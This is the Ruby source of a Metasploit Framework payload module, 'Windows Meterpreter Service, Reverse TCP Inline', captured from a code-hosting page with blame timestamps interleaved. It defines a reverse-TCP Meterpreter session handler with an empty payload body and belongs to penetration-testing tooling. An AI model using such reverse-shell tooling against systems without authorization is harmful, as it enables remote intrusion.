metasploit-framework/modules/payloads/singles/windows/metsvc_reverse_tcp.rb

39 lines
1.0 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/meterpreter_x86_win'
require 'msf/base/sessions/meterpreter_options'
2016-03-08 13:02:44 +00:00
module MetasploitModule
CachedSize = 0
2013-08-30 21:28:54 +00:00
include Msf::Payload::Windows
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows Meterpreter Service, Reverse TCP Inline',
'Description' => 'Stub payload for interacting with a Meterpreter Service',
'Author' => 'hdm',
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Meterpreter_x86_Win,
'Payload' =>
{
'Offsets' => {},
'Payload' => ""
}
))
end
end